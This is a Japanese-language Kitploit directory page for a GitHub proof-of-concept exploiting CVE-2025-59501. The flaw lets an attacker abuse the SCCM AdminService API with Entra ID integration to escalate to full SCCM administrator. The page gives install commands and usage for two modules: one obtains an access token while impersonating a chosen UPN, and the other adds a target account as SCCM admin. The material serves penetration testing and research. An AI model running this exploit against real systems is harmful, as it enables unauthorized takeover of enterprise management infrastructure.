Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59501 — CVE-2025-59501 POCコード | Kitploit
ツール/GitHubGitHub/garrettfoster13/cve-2025-59501
特権昇格脆弱性分析エクスプロイトペネトレーションテストクラウドセキュリティアイデンティティ&アクセス管理 (IAM)認証レッドチーミング
GitHubgarrettfoster13/cve-2025-59501

CVE-2025-59501

CVE-2025-59501 POCコード

リポジトリを見る
25149ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59501

Entra ID統合が有効なSCCMのAdminService APIを悪用して、フル管理者に昇格しSCCM階層を乗っ取るためのPoCです。詳細はこちらのブログをご覧ください。

必要条件

uv

インストール

root@kitploit:~
git clone https://github.com/garrettfoster13/CVE-2025-59501.git
cd CVE-2025-59501/
uv sync

使用方法

このツールにはtokenとadminの2つのモジュールがあります。

root@kitploit:~
➜  CVE-2025-59501 git:(main) ✗ uv run poc.py
usage: poc.py [-h] {token,admin} ...

@unsigned_sh0rtによるCVE-2025-59501を悪用するPoC

positional arguments:
  {token,admin}
    token        AdminServiceアクセストークンを取得
    admin        ユーザーをSCCM管理者として追加

options:
  -h, --help     このヘルプメッセージを表示して終了

tokenモジュールは、偽装したいUPNを持つEntra/ADユーザーとしてアクセストークンを要求するために使用します。

root@kitploit:~
➜  CVE-2025-59501 git:(main) ✗ uv run poc.py token -h
usage: poc.py token [-h] -u USERNAME [-p PASSWORD] -c CLIENT_ID -t TENANT_ID [-s SCOPE]

options:
  -h, --help            このヘルプメッセージを表示して終了
  -u, --username USERNAME
                        ユーザー名
  -p, --password PASSWORD
                        パスワード
  -c, --client-id CLIENT_ID
                        AzureアプリのクライアントID
  -t, --tenant-id TENANT_ID
                        EntraテナントID
  -s, --scope SCOPE     リソースURI/スコープ

adminモジュールは、トークンを使用してAdminService APIに認証し、対象のユーザーアカウントをSCCM管理者として追加します。

root@kitploit:~
➜  CVE-2025-59501 git:(main) ✗ uv run poc.py admin -h
usage: poc.py admin [-h] -t TARGET -u USER -s SID -a ACCESS_TOKEN

options:
  -h, --help            このヘルプメッセージを表示して終了
  -t, --target TARGET   対象のSMSプロバイダのFQDNまたはIPアドレス
  -u, --user USER       管理者として追加するユーザー名
  -s, --sid SID         新しい管理者ユーザーのSID
  -a, --access-token ACCESS_TOKEN
                        AdminServiceアクセストークン
ツールをダウンロード